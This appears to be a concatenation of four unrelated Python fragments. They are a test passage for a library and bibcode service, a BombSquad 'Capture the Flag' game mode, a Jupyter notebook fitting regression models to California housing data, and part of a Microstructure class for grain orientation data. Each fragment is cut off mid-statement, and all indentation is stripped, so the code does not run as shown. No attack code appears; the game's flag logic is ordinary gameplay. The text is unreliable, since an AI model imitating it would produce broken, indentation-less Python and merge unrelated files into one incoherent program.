# make sure the owner is correct
self.assertIn(libraries['owner'], self.stub_user_3.email)
# For user write
with MockEmailService(self.stub_user_3, end_type='uid'):
libraries = self.user_view.get_libraries(
service_uid=user_write.id,
absolute_uid=user_write.absolute_uid
)[0]
self.assertTrue(libraries['num_users'] == 0)
self.assertIn(libraries['owner'], self.stub_user_3.email)
def test_user_cannot_add_two_libraries_with_the_same_name(self):
"""
Test that a user cannot add a new library with the same name
:return: no return
"""
# To make a library we need an actual user
user = User(absolute_uid=self.stub_user.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
session.refresh(user)
session.expunge(user)
# Make the first library
self.user_view.create_library(
service_uid=user.id,
library_data=self.stub_library.user_view_post_data
)
# Make the second library
with self.assertRaises(BackendIntegrityError):
self.user_view.create_library(
service_uid=user.id,
library_data=self.stub_library.user_view_post_data
)
def test_default_name_and_description_given_when_empty_string_passed(self):
"""
Test that a user who provides empty strings for the name and
description has them generated automatically.
:return: no return
"""
# Stub data
stub_library = LibraryShop()
# To make a library we need an actual user
user = User(absolute_uid=self.stub_user.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
session.refresh(user)
session.expunge(user)
# Make the first library
for i in range(2):
# On each loop the user view post will be modified, so lets just
# be explicit about what we want
stub_library.user_view_post_data['name'] = ''
stub_library.user_view_post_data['description'] = ''
library = self.user_view.create_library(
service_uid=user.id,
library_data=stub_library.user_view_post_data
)
lib = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library['id'])).one()
self.assertTrue(lib.name == 'Untitled Library {0}'.format(i+1))
self.assertTrue(lib.description == DEFAULT_LIBRARY_DESCRIPTION)
def test_default_name_and_description_given_when_no_content(self):
"""
Test that a user who does not specify a title or description has them
generated automatically.
:return: no return
"""
# Stub data
stub_library = LibraryShop(name=None, description=None)
del stub_library.name
del stub_library.description
with self.assertRaises(AttributeError):
stub_library.name
stub_library.description
stub_library.user_view_post_data.pop('name')
stub_library.user_view_post_data.pop('description')
with self.assertRaises(KeyError):
stub_library.user_view_post_data['name']
stub_library.user_view_post_data['description']
# To make a library we need an actual user
user = User(absolute_uid=self.stub_user.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
session.refresh(user)
session.expunge(user)
# Make the first library
for i in range(2):
library = self.user_view.create_library(
service_uid=user.id,
library_data=stub_library.user_view_post_data
)
with self.app.session_scope() as session:
lib = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library['id'])).one()
self.assertTrue(lib.name == 'Untitled Library {0}'.format(i+1))
self.assertTrue(lib.description == DEFAULT_LIBRARY_DESCRIPTION)
def test_long_description_is_truncated(self):
"""
Test that a user who provides a very long library description has that description
truncated appropriately.
:return: no return
"""
# stub data
stub_library = LibraryShop(name="Test Library", description="x"*400)
# make a user
user = User(absolute_uid=self.stub_user.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
session.refresh(user)
session.expunge(user)
# make the library
library = self.user_view.create_library(service_uid=user.id, library_data=stub_library.user_view_post_data)
# check description length
with self.app.session_scope() as session:
lib = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library['id'])).one()
self.assertTrue(lib.name == "Test Library")
self.assertTrue(len(lib.description) <= 200)
class TestLibraryViews(TestCaseDatabase):
"""
Base class to test the Library view for GET
"""
def __init__(self, *args, **kwargs):
"""
Constructor of the class
:param args: to pass on to the super class
:param kwargs: to pass on to the super class
:return: no return
"""
super(TestLibraryViews, self).__init__(*args, **kwargs)
self.user_view = UserView
self.library_view = LibraryView
self.stub_user = self.stub_user_1 = UserShop()
self.stub_user_2 = UserShop()
self.stub_library = LibraryShop()
def test_user_can_get_documents_from_library(self):
"""
Test that can retrieve all the bibcodes from a library
:return: no return
"""
# Ensure a user exists
user = User(absolute_uid=self.stub_user.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
# Ensure a library exists
library = Library(name='MyLibrary',
description='My library',
public=True,
bibcode=self.stub_library.bibcode)
# Give the user and library permissions
permission = Permissions(permissions={'read': True, 'write': True, 'admin': False, 'owner': True})
# Commit the stub data
user.permissions.append(permission)
library.permissions.append(permission)
session.add_all([library, permission, user])
session.commit()
for obj in [library, permission, user]:
session.refresh(obj)
session.expunge(obj)
# Retrieve the bibcodes using the web services
with MockEmailService(self.stub_user, end_type='uid'):
response_library, meta_data = \
self.library_view.get_documents_from_library(
library_id=library.id,
service_uid=user.id
)
self.assertEqual(library.bibcode, response_library.bibcode)
def test_user_retrieves_correct_library_content(self):
"""
Test that the contents returned from the library_view contains all the
information that we want
:return: no return
"""
# Stub data
user = User(absolute_uid=self.stub_user.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
# Ensure a library exists
library = Library(name='MyLibrary',
description='My library',
public=True,
bibcode=self.stub_library.bibcode)
# Give the user and library permissions
permission = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True})
# Commit the stub data
user.permissions.append(permission)
library.permissions.append(permission)
session.add_all([library, permission, user])
session.commit()
for obj in [library, permission, user]:
session.refresh(obj)
session.expunge(obj)
with MockEmailService(self.stub_user, end_type='uid'):
library, metadata = self.library_view.get_documents_from_library(
library_id=library.id,
service_uid=user.id
)
for key in self.stub_library.library_view_get_response():
self.assertIn(key, metadata)
def test_user_retrieves_correct_library_content_if_not_owner(self):
"""
Test that the contents returned from the library_view contains all the
information that we want
:return: no return
"""
# Stub data
user = User(absolute_uid=self.stub_user.absolute_uid)
user_random = User(absolute_uid=self.stub_user_2.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
# Ensure a library exists
library = Library(name='MyLibrary',
description='My library',
public=False,
bibcode=self.stub_library.bibcode)
# Give the user and library permissions
permission = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True})
# Commit the stub data
user.permissions.append(permission)
library.permissions.append(permission)
session.add_all([library, permission, user, user_random])
session.commit()
for obj in [library, permission, user, user_random]:
session.refresh(obj)
session.expunge(obj)
with MockEmailService(self.stub_user, end_type='uid'):
library, metadata = self.library_view.get_documents_from_library(
library_id=library.id,
service_uid=user_random.id
)
for key in self.stub_library.library_view_get_response():
self.assertIn(key, metadata)
self.assertEqual(0, metadata['num_users'])
def test_that_solr_data_is_returned(self):
"""
Test that can retrieve all the bibcodes from a library with the data
returned from the solr bigquery end point
:return: no return
"""
# Ensure a user exists
user = User(absolute_uid=self.stub_user.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
# Ensure a library exists
library = Library(name='MyLibrary',
description='My library',
public=True,
bibcode=self.stub_library.bibcode)
# Give the user and library permissions
permission = Permissions(permissions={'read': True, 'write': True, 'admin': False, 'owner': False})
# Commit the stub data
user.permissions.append(permission)
library.permissions.append(permission)
session.add_all([library, permission, user])
session.commit()
for obj in [library, permission, user]:
session.refresh(obj)
session.expunge(obj)
# Retrieve the bibcodes using the web services
with MockSolrBigqueryService():
response_library = self.library_view.solr_big_query(
bibcodes=library.bibcode
)
self.assertIn('responseHeader', response_library.json())
def test_that_solr_updates_canonical_bibcodes(self):
"""
Tests that a comparison between the solr data and the stored data is
carried out. Mismatching documents are then updated appropriately.
:return: no return
"""
# Ensure a | |
import bs
import random
def bsGetAPIVersion():
# see bombsquadgame.com/apichanges
return 4
def bsGetGames():
return [CTFGame]
class CTFFlag(bs.Flag):
def __init__(self, activity, team):
bs.Flag.__init__(
self,
materials=[team.gameData['flagMaterial']],
position=team.gameData['basePos'],
color=team.color)
self._team = team
self._heldCount = 0
self._counter = bs.newNode(
'text',
owner=self.node,
attrs={
'inWorld': True,
'scale': 0.02,
'hAlign': 'center'
})
self.resetReturnTimes()
def resetReturnTimes(self):
self._timeOutRespawnTime = int(
self.getActivity().settings['Flag Idle Return Time'])
self._touchReturnTime = float(
self.getActivity().settings['Flag Touch Return Time'])
def getTeam(self):
return self._team
class CTFGame(bs.TeamGameActivity):
@classmethod
def getName(cls):
return 'Capture the Flag'
@classmethod
def getDescription(cls, sessionType):
return 'Return the enemy flag to score.'
@classmethod
def supportsSessionType(cls, sessionType):
return True if issubclass(sessionType, bs.TeamsSession) else False
@classmethod
def getSupportedMaps(cls, sessionType):
return bs.getMapsSupportingPlayType("teamFlag")
@classmethod
def getSettings(cls, sessionType):
return [
("Score to Win", {'minValue': 1, 'default': 3}),
("Flag Touch Return Time", {
'minValue': 0, 'default': 0, 'increment': 1}),
("Flag Idle Return Time", {
'minValue': 5, 'default': 30, 'increment': 5}),
("Time Limit", {
'choices': [('None', 0), ('1 Minute', 60),
('2 Minutes', 120), ('5 Minutes', 300),
('10 Minutes', 600), ('20 Minutes', 1200)],
'default': 0 }),
("Respawn Times", {
'choices': [('Shorter', 0.25), ('Short', 0.5), ('Normal',1.0),
('Long',2.0), ('Longer', 4.0)],
'default': 1.0}),
("Epic Mode", {'default': False})] # yapf: disable
def __init__(self, settings):
bs.TeamGameActivity.__init__(self, settings)
self._scoreBoard = bs.ScoreBoard()
if self.settings['Epic Mode']: self._isSlowMotion = True
self._alarmSound = bs.getSound("alarm")
self._tickingSound = bs.getSound("ticking")
self._lastScoreTime = 0
self._scoreSound = bs.getSound("score")
self._swipSound = bs.getSound("swip")
self._allBasesMaterial = bs.Material()
def getInstanceDescription(self):
if self.settings['Score to Win'] == 1: return 'Steal the enemy flag.'
else:
return ('Steal the enemy flag ${ARG1} times.',
self.settings['Score to Win'])
def getInstanceScoreBoardDescription(self):
if self.settings['Score to Win'] == 1: return 'return 1 flag'
else: return ('return ${ARG1} flags', self.settings['Score to Win'])
def onTransitionIn(self):
bs.TeamGameActivity.onTransitionIn(
self,
music='Epic' if self.settings['Epic Mode'] else 'FlagCatcher')
def onTeamJoin(self, team):
team.gameData['score'] = 0
team.gameData['flagReturnTouches'] = 0
team.gameData['homeFlagAtBase'] = True
team.gameData['touchReturnTimer'] = None
team.gameData['enemyFlagAtBase'] = False
team.gameData['basePos'] = self.getMap().getFlagPosition(team.getID())
self.projectFlagStand(team.gameData['basePos'])
bs.newNode(
'light',
attrs={
'position': team.gameData['basePos'],
'intensity': 0.6,
'heightAttenuated': False,
'volumeIntensityScale': 0.1,
'radius': 0.1,
'color': team.color
})
baseRegionMat = team.gameData['baseRegionMaterial'] = bs.Material()
p = team.gameData['basePos']
team.gameData['baseRegion'] = bs.newNode(
"region",
attrs={
'position': (p[0], p[1] + 0.75, p[2]),
'scale': (0.5, 0.5, 0.5),
'type': 'sphere',
'materials': [baseRegionMat, self._allBasesMaterial]
})
# create some materials for this team
spazMatNoFlagPhysical = team.gameData[
'spazMaterialNoFlagPhysical'] = bs.Material()
spazMatNoFlagCollide = team.gameData[
'spazMaterialNoFlagCollide'] = bs.Material()
flagMat = team.gameData['flagMaterial'] = bs.Material()
# some parts of our spazzes don't collide physically with our
# flags but generate callbacks
spazMatNoFlagPhysical.addActions(
conditions=('theyHaveMaterial', flagMat),
actions=(('modifyPartCollision', 'physical',
False), ('call', 'atConnect',
lambda: self._handleHitOwnFlag(team, 1)),
('call', 'atDisconnect',
lambda: self._handleHitOwnFlag(team, 0))))
# other parts of our spazzes don't collide with our flags at all
spazMatNoFlagCollide.addActions(
conditions=('theyHaveMaterial', flagMat),
actions=('modifyPartCollision', 'collide', False))
# we wanna know when *any* flag enters/leaves our base
baseRegionMat.addActions(
conditions=('theyHaveMaterial', bs.Flag.getFactory().flagMaterial),
actions=(('modifyPartCollision', 'collide',
True), ('modifyPartCollision', 'physical', False),
('call', 'atConnect',
lambda: self._handleFlagEnteredBase(team)),
('call', 'atDisconnect',
lambda: self._handleFlagLeftBase(team))))
self._spawnFlagForTeam(team)
self._updateScoreBoard()
def onBegin(self):
bs.TeamGameActivity.onBegin(self)
self.setupStandardTimeLimit(self.settings['Time Limit'])
self.setupStandardPowerupDrops()
bs.gameTimer(1000, call=self._tick, repeat=True)
def _spawnFlagForTeam(self, team):
flag = team.gameData['flag'] = CTFFlag(self, team)
team.gameData['flagReturnTouches'] = 0
self._flashBase(team, length=1000)
bs.playSound(self._swipSound, position=flag.node.position)
def _handleFlagEnteredBase(self, team):
flag = bs.getCollisionInfo("opposingNode").getDelegate()
if flag.getTeam() is team:
team.gameData['homeFlagAtBase'] = True
# if the enemy flag is already here, score!
if team.gameData['enemyFlagAtBase']:
self._score(team)
else:
team.gameData['enemyFlagAtBase'] = True
if team.gameData['homeFlagAtBase']:
# award points to whoever was carrying the enemy flag
try:
player = flag._lastPlayerToHold
except Exception:
player = None
if player is not None and player.exists(
) and player.getTeam() is team:
self.scoreSet.playerScored(player, 50, bigMessage=True)
# update score and reset flags
self._score(team)
# if the home-team flag isn't here, print a message to that effect
else:
if not hasattr(self, '_lastHomeFlagNoticePrintTime'):
self._lastHomeFlagNoticePrintTime = 0
t = bs.getRealTime()
if t - self._lastHomeFlagNoticePrintTime > 5000:
self._lastHomeFlagNoticePrintTime = t
p = team.gameData['basePos']
tNode = bs.newNode(
'text',
attrs={
'text':
bs.Lstr(resource='ownFlagAtYourBaseWarning'),
'inWorld':
True,
'scale':
0.013,
'color': (1, 1, 0, 1),
'hAlign':
'center',
'position': (p[0], p[1] + 3.2, p[2])
})
bs.gameTimer(5100, tNode.delete)
bs.animate(tNode, 'scale', {
0: 0,
200: 0.013,
4800: 0.013,
5000: 0
})
def _tick(self):
# if either flag is away from base and not being held, tick down its
# respawn timer
for team in self.teams:
flag = team.gameData['flag']
if not team.gameData['homeFlagAtBase'] and flag._heldCount == 0:
timeOutCountingDown = True
flag._timeOutRespawnTime -= 1
if flag._timeOutRespawnTime <= 0:
flag.handleMessage(bs.DieMessage())
else:
timeOutCountingDown = False
if flag.node.exists() and flag._counter.exists():
t = flag.node.position
flag._counter.position = (t[0], t[1] + 1.3, t[2])
# if there's no self-touches on this flag, set its text
# to show its auto-return counter. (if there's self-touches
# its showing that time)
if team.gameData['flagReturnTouches'] == 0:
flag._counter.text = str(flag._timeOutRespawnTime) if (
timeOutCountingDown
and flag._timeOutRespawnTime <= 10) else ''
flag._counter.color = (1, 1, 1, 0.5)
flag._counter.scale = 0.014
def _score(self, team):
team.gameData['score'] += 1
bs.playSound(self._scoreSound)
self._flashBase(team)
self._updateScoreBoard()
# have teammates celebrate
for player in team.players:
try:
player.actor.node.handleMessage('celebrate', 2000)
except Exception:
pass
# reset all flags/state
for resetTeam in self.teams:
if not resetTeam.gameData['homeFlagAtBase']:
resetTeam.gameData['flag'].handleMessage(bs.DieMessage())
resetTeam.gameData['enemyFlagAtBase'] = False
if team.gameData['score'] >= self.settings['Score to Win']:
self.endGame()
def endGame(self):
results = bs.TeamGameResults()
for t in self.teams:
results.setTeamScore(t, t.gameData['score'])
self.end(results=results, announceDelay=800)
def _handleFlagLeftBase(self, team):
curTime = bs.getGameTime()
opNode = bs.getCollisionInfo("opposingNode")
try:
flag = opNode.getDelegate()
except Exception:
return # can happen when we kill a flag
if flag.getTeam() is team:
# check times here to prevent too much flashing
if ('lastFlagLeaveTime' not in team.gameData
or curTime - team.gameData['lastFlagLeaveTime'] > 3000):
bs.playSound(
self._alarmSound, position=team.gameData['basePos'])
self._flashBase(team)
team.gameData['lastFlagLeaveTime'] = curTime
team.gameData['homeFlagAtBase'] = False
else:
team.gameData['enemyFlagAtBase'] = False
def _touchReturnUpdate(self, team):
# count down only while its away from base and not being held
if (team.gameData['homeFlagAtBase']
or team.gameData['flag']._heldCount > 0):
team.gameData['touchReturnTimerTicking'] = None
return # no need to return when its at home
else:
if team.gameData['touchReturnTimerTicking'] is None:
team.gameData['touchReturnTimerTicking'] = bs.NodeActor(
bs.newNode(
'sound',
attrs={
'sound': self._tickingSound,
'positional': False,
'loop': True
}))
flag = team.gameData['flag']
flag._touchReturnTime -= 0.1
if flag._counter.exists():
flag._counter.text = "%.1f" % flag._touchReturnTime
flag._counter.color = (1, 1, 0, 1)
flag._counter.scale = 0.02
if flag._touchReturnTime <= 0.0:
self._awardPlayersTouchingOwnFlag(team)
flag.handleMessage(bs.DieMessage())
def _awardPlayersTouchingOwnFlag(self, team):
for player in team.players:
if player.gameData['touchingOwnFlag'] > 0:
returnScore = 10 + 5 * int(
self.settings['Flag Touch Return Time'])
self.scoreSet.playerScored(
player, returnScore, screenMessage=False)
def _handleHitOwnFlag(self, team, val):
# keep track of when each player is touching their own flag so we can
# award points when returned
srcNode = bs.getCollisionInfo('sourceNode')
try:
player = srcNode.getDelegate().getPlayer()
except Exception:
player = None
if player is not None and player.exists():
if val: player.gameData['touchingOwnFlag'] += 1
else: player.gameData['touchingOwnFlag'] -= 1
# if return-time is zero, just kill it immediately.. otherwise keep
# track of touches and count down
if float(self.settings['Flag Touch Return Time']) <= 0.0:
if (not team.gameData['homeFlagAtBase']
and team.gameData['flag']._heldCount == 0):
# use a node message to kill the flag instead of just killing
# our team's. (avoids redundantly killing new flags if
# multiple body parts generate callbacks in one step)
node = bs.getCollisionInfo("opposingNode")
if node is not None and node.exists():
self._awardPlayersTouchingOwnFlag(team)
node.handleMessage(bs.DieMessage())
# takes a non-zero amount of time to return
else:
if val:
team.gameData['flagReturnTouches'] += 1
if team.gameData['flagReturnTouches'] == 1:
team.gameData['touchReturnTimer'] = bs.Timer(
100,
call=bs.Call(self._touchReturnUpdate, team),
repeat=True)
team.gameData['touchReturnTimerTicking'] = None
else:
team.gameData['flagReturnTouches'] -= 1
if team.gameData['flagReturnTouches'] == 0:
team.gameData['touchReturnTimer'] = None
team.gameData['touchReturnTimerTicking'] = None
if team.gameData['flagReturnTouches'] < 0:
bs.printError(
'CTF: flagReturnTouches < 0; this shouldn\'t happen.')
def _flashBase(self, team, length=2000):
light = bs.newNode(
'light',
attrs={
'position': team.gameData['basePos'],
'heightAttenuated': False,
'radius': 0.3,
'color': team.color
})
bs.animate(light, 'intensity', {0: 0, 250: 2.0, 500: 0}, loop=True)
bs.gameTimer(length, light.delete)
def spawnPlayerSpaz(self, *args, **keywds):
# intercept new spazzes and add our team material for them
spaz = bs.TeamGameActivity.spawnPlayerSpaz(self, *args, **keywds)
spaz.getPlayer().gameData['touchingOwnFlag'] = 0
noPhysicalMats = [
spaz.getPlayer().getTeam().gameData['spazMaterialNoFlagPhysical']
]
noCollideMats = [
spaz.getPlayer().getTeam().gameData['spazMaterialNoFlagCollide']
]
# our normal parts should still collide; just not physically
# (so we can calc restores)
spaz.node.materials = list(spaz.node.materials) + noPhysicalMats
spaz.node.rollerMaterials = list(
spaz.node.rollerMaterials) + noPhysicalMats
# pickups and punches shouldn't hit at all though
spaz.node.punchMaterials = list(
spaz.node.punchMaterials) + noCollideMats
spaz.node.pickupMaterials = list(
spaz.node.pickupMaterials) + noCollideMats
spaz.node.extrasMaterials = list(
spaz.node.extrasMaterials) + noCollideMats
return spaz
def _updateScoreBoard(self):
for team in self.teams:
self._scoreBoard.setTeamValue(team, team.gameData['score'],
self.settings['Score to Win'])
def handleMessage(self, m):
if isinstance(m, bs.PlayerSpazDeathMessage):
bs.TeamGameActivity.handleMessage(self, m) # augment standard
self.respawnPlayer(m.spaz.getPlayer())
elif isinstance(m, bs.FlagDeathMessage):
try:
bs.gameTimer(100, bs.Call(self._spawnFlagForTeam, m.flag.getTeam()))
except: pass
elif | |
#!/usr/bin/env python
# coding: utf-8
# # Regression Project: The California Housing Prices Data Set
# ### Context
# This is the dataset used in the second chapter of <NAME>'s recent book *'Hands-On Machine learning with Scikit-Learn and TensorFlow'. (O'Reilly)*
#
# It serves as an excellent introduction to implementing machine learning algorithms because it requires rudimentary (first, primary, original, prime, primitive) data cleaning, has an easily understandable list of variables and sits at an optimal size between being to toyish and too cumbersome.
#
# The data contains information from the 1990 California census.
#
# ### Source
# This dataset is a modified version of the California Housing dataset available from Luís Torgo's page (University of Porto).
#
# This dataset appeared in a 1997 paper titled *Sparse Spatial Autoregressions* by <NAME> and <NAME>, published in the *Statistics and Probability Letters* journal. **It contains one row per census block group**. A block group is the smallest geographical unit for which the U.S. Census Bureau publishes sample data **(a block group typically has a population of 600 to 3,000 people)**.
#
# Note that the **block groups are called "districts"** in the Jupyter notebooks, simply because in some contexts the name "block group" was confusing.
#
# ### Content
# The data aren't cleaned so there are some preprocessing steps that were
# required.
#
# The data file weighs about 1.35 MB and has 20,640 rows and 10 columns.
# The names of the columns are pretty self explanatory:
# 1. longitude: A measure of how far west a house is; a higher value is farther west
# 2. latitude: A measure of how far north a house is; a higher value is farther north
# 3. housing_median_age: Median age of a house within a block; a lower number is a newer building **("Block" == "District")**
# 4. total_rooms: Total number of rooms within a block
# 5. total_bedrooms: Total number of bedrooms within a block
# 6. population: Total number of people residing within a block
# 7. households: Total number of households, a group of people residing within a home unit, for a block
# 8. median_income: Median income for households within a block of houses (measured in tens of thousands of US Dollars)
# 9. median_house_value: Median house value for households within a block (measured in US Dollars)
# 10. ocean_proximity: Location of the house w.r.t ocean/sea
#
# ### Tweaks
# The dataset in this directory is almost identical to the original, with two differences:
# - 207 values were randomly removed from the **total_bedrooms** column, so we can
# discuss what to do with **missing data**.
# - An additional categorical attribute called **ocean_proximity** was added,# the Bay area, inland or on an island. This allows discussing what to do with **categorical data**.
#
#
# ## Import statements
#
#
# In[ ]:
# General tools
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# statsmodels package
import statsmodels.api as sm
import statsmodels.formula.api as smf
# For transformations and predictions
from sklearn.preprocessing import FunctionTransformer
from sklearn.linear_model import LinearRegression
from scipy.optimize import curve_fit
from sklearn.tree import DecisionTreeRegressor, export_graphviz
from itertools import product
from sklearn.neighbors import KNeighborsRegressor
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import pairwise_distances
from sklearn.model_selection import KFold, cross_val_score
from sklearn.decomposition import PCA
# For the tree visualization
import pydot
from IPython.display import Image
from sklearn.externals.six import StringIO
# For scoring
from sklearn.metrics import mean_squared_error as mse
from sklearn.metrics import mean_squared_log_error as msle
# For split
from sklearn.model_selection import train_test_split as split
from sys import modules
import warnings
warnings.filterwarnings('ignore')
# ## Get the data
# **Upload**
# In[ ]:
if 'google.colab' in modules:
from google.colab import files
uploaded = files.upload()
# **Read file**
# In[ ]:
housing_df = pd.read_csv("../../../input/camnugent_california-housing-prices/housing.csv")
housing_df.shape
# In[ ]:
housing_df
# ## EDA with map visualization
# One good practice is to do EDA on the full data and **creating a copy** of it for not harming our test and training data.
# In[ ]:
plotter_df = housing_df.copy()
# In[ ]:
from PIL import Image
plt.figure(figsize=(20,10))
img = np.array(Image.open("california.jpg"))
plt.imshow(img, interpolation = "bilinear")
plt.axis("off")
print()
# **Since there is geographical information (latitude and longitude), it is a good idea to create a scatterplot of all districts to visualize the data.**
# In order to have an informative look on the plot we need to know the density for each point, so we use alpha=0.1 (transparency measure).
# In[ ]:
plt.figure(figsize=(10,8))
plt.scatter('longitude', 'latitude', data=plotter_df,alpha=0.1)
plt.ylabel('Latitudes')
plt.xlabel('Longitudes')
plt.title('Geographical plot of Latitudes/Longitudes')
print()
# **median_income** influence on **median_house_value.**
# In[ ]:
plotter_df.plot(kind='scatter', x='longitude', y='latitude', alpha=0.4,s=plotter_df['median_income']*30, label='median_income', figsize=(10,7),c='median_house_value', cmap=plt.get_cmap('jet'), colorbar=True)
plt.xlabel("Longitude", fontsize=14)
plt.ylabel("Latitude", fontsize=14)
plt.legend()
print()
# ## Look at the Data
# In[ ]:
housing_df.head()
# In[ ]:
housing_df.describe(include='all')
# In[ ]:
housing_df.info()
# We can see that the 'total_bedrooms' column has only 20,433 non-null values compared to 20,640 non-null values in other columns.
#
#
# In[ ]:
housing_df.isna().sum()
# # Data Cleaning
# ## Handling missing values
# Most Machine Learning algorithms cannot work with missing features, so let’s create a few functions to take care of them. We noticed earlier that the total_bedrooms attribute has some missing values, so let’s fix this. We have three options:
# 1. Get rid of the corresponding districts.
# 2. Get rid of the whole attribute.
# 3. Set the values to some value (zero, the mean, the median, etc.)
# In[ ]:
# Option 1: dropping rows (districts) with missing values
housing_df.dropna(subset=["total_bedrooms"], inplace=True)
housing_df.shape
# In[ ]:
# Option 2: dropping the whole column
#housing_df.drop("total_bedrooms", axis=1, inplace=True)
#housing_df.shape
# In[ ]:
# Option 3: fill NA values
#median_total_bedrooms = housing_df["total_bedrooms"].median()
#housing_df["total_bedrooms"].fillna(median_total_bedrooms, inplace=True)
#housing_df.shape
# ## Handling ocean_proximity categorical column.
# In[ ]:
housing_df['ocean_proximity'].value_counts()
# In[ ]:
housing_df.boxplot(column=['median_house_value'], by='ocean_proximity')
# We can see that there are only 5 rows with 'ocean_proximity'=='ISLAND'.
# We decided to drop these values.
# In[ ]:
housing_df.drop(housing_df[housing_df['ocean_proximity']=='ISLAND'].index, inplace=True)
housing_df.shape
# ### Transform categorical data to discrete values
# In[ ]:
ocean_proximity_order = ['INLAND','<1H OCEAN', 'NEAR OCEAN', 'NEAR BAY']
#ocean_proximity_order = ['<1H OCEAN', 'INLAND', 'NEAR OCEAN', 'NEAR BAY', 'ISLAND']
ocean_proximity_map = dict(zip(ocean_proximity_order, range(len(ocean_proximity_order))))
housing_df['ocean_proximity'] = housing_df['ocean_proximity'].map(ocean_proximity_map)
# In[ ]:
housing_df['ocean_proximity'].value_counts()
# ## Creating new features and deleting unnecessary features
# 1. The total number of rooms in a district is not very useful if you don’t know how many
# households there are. What we really want is the number of rooms per household.
#
# 2. Similarly, the total number of bedrooms by itself is not very useful: We want to compare it to the number of rooms.
#
# 3. The population per household also seems like an interesting attribute combination to look at.
# In[ ]:
housing_df["rooms_per_household"] = housing_df["total_rooms"]/housing_df["households"]
housing_df["bedrooms_per_room"] = housing_df["total_bedrooms"]/housing_df["total_rooms"]
housing_df["population_per_household"]=housing_df["population"]/housing_df["households"]
# In[ ]:
# dropping unnecessary features
housing_df.drop(["total_rooms","total_bedrooms","population"], axis=1, inplace=True)
housing_df.head()
# In[ ]:
housing_df.shape
# ## Split the data to train and test
# In[ ]:
housing_df_train, housing_df_test = split(housing_df, test_size=0.3, random_state=43)
# In[ ]:
housing_df_train.shape
# ## Removing Outliers
#
# we can see median_house_value and housing_median_age have "peaks"
# and this data should be removed.
# In[ ]:
housing_df_train.hist(bins=50,figsize=(20,15))
# In[ ]:
housing_df_train = housing_df_train[(housing_df_train.median_house_value < 500001) & (housing_df_train.housing_median_age < 52)]
housing_df_train.shape
# Now we drop data which is not in the range of 3 sigma (+/-).
# In[ ]:
for col in housing_df_train.columns:
if housing_df_train[col].dtype == 'float64':
std = housing_df_train[col].std()
ave = housing_df_train[col].mean()
housing_df_train_1 = housing_df_train.loc[housing_df_train[col].between(ave-3*std, ave+3*std)]
print(f'processing {col:10} --> {housing_df_train_1.shape[0]:5} rows remain')
# # Linear Regression model: Assumptions of Linear Regression:
#
# 1) Linear Relationship between the features and target
#
# 2) Little or no Multicollinearity between the features
#
# 3) Homoscedasticity
#
# 4) Normal distribution of error
#
# 5) Little or No autocorrelation in the residuals
# ### Check skewness (a measure of the asymmetry of a probability distribution)
# In[ ]:
housing_df_train_1.skew()
# In[ ]:
#log_rooms_per_household = np.log1p(housing_df_train_1['rooms_per_household'])
#log_population_per_household = np.log1p(housing_df_train_1['population_per_household'])
#log_households = np.log1p(housing_df_train_1['households'])
#log_bedrooms_per_room = np.log1p(housing_df_train_1['bedrooms_per_room'])
#housing_df_train_1['log_rooms_per_household'] = log_rooms_per_household
#housing_df_train_1['log_population_per_household'] = log_population_per_household
#housing_df_train_1['log_households'] = log_households
#housing_df_train_1['log_bedrooms_per_room'] = log_bedrooms_per_room
# dropping unnecessary features
#housing_df_train_1.drop(["rooms_per_household","population_per_household","households","bedrooms_per_room" ], axis=1, inplace=True)
#housing_df_train_1.skew()
# In[ ]:
housing_df_train_1.head()
# ## Split and scaling the data and preparation to model
# In[ ]:
X_train = housing_df_train_1.drop(['median_house_value'],axis=1)
y_train = housing_df_train_1['median_house_value']
# scaling the data
scaler = MinMaxScaler()
scaler.fit(X_train)
X_train_scaled = pd.DataFrame(scaler.transform(X_train), columns=X_train.columns)
X_train_scaled.head()
# #Linear Relationship between the features and target
# ## Correlation
# In[ ]:
corr_matrix = housing_df_train_1.corr()
# we can see that median_income and ocean_proximity has the most efect on
# median_house_value
# In[ ]:
corr_matrix['median_house_value'].sort_values(ascending=False)
# **We can see a small negative correlation between the latitude and the median house value (i.e., prices have a slight tendency to go down when you go north.**
# # Assumption check: Little or no Multicollinearity between the features
# In[ ]:
from statsmodels.stats.outliers_influence import variance_inflation_factor
variables = X_train_scaled
vif = pd.DataFrame()
vif["VIF"] = [variance_inflation_factor(variables.values, i) for i in range(variables.shape[1])]
vif["features"] = variables.columns
# In[ ]:
vif
# In[ ]:
X_train_scaled_1 = X_train_scaled.drop(['longitude','bedrooms_per_room'],axis=1)
# fit the linear model
# In[ ]:
regr = LinearRegression()
regr.fit(X_train_scaled_1, y_train)
y_train_pred = regr.predict(X_train_scaled_1)
resids = | |
grain ids can be used to restrict the grains.
A list of `Orientation` instances is then created and returned.
:param list id_list: a non empty list of the grain ids.
:return: a list of the grain orientations.
"""
rods = self.get_grain_rodrigues(id_list)
orientations = [Orientation.from_rodrigues(rod) for rod in rods]
return orientations
def get_grain_bounding_boxes(self, id_list=None):
"""Get the grain bounding boxes.
The grain data table is queried and the bounding boxes of the grains
are returned in a single array. An optional list of grain ids can be
used to restrict the grains, by default all the grain bounding boxes
are returned.
:param list id_list: a non empty list of the grain ids.
:return: a numpy array containing the grain bounding boxes.
"""
if id_list:
condition = Microstructure.id_list_to_condition(id_list)
return self.grains.read_where(eval(condition))['bounding_box']
else:
return self.get_tablecol('GrainDataTable', 'bounding_box')
def get_voxel_size(self):
"""Get the voxel size for image data of the microstructure.
If this instance of `Microstructure` has no image data, None is returned.
"""
try:
return self.get_attribute(attrname='spacing',
nodename='/CellData')[0]
except:
return None
def get_grain(self, gid):
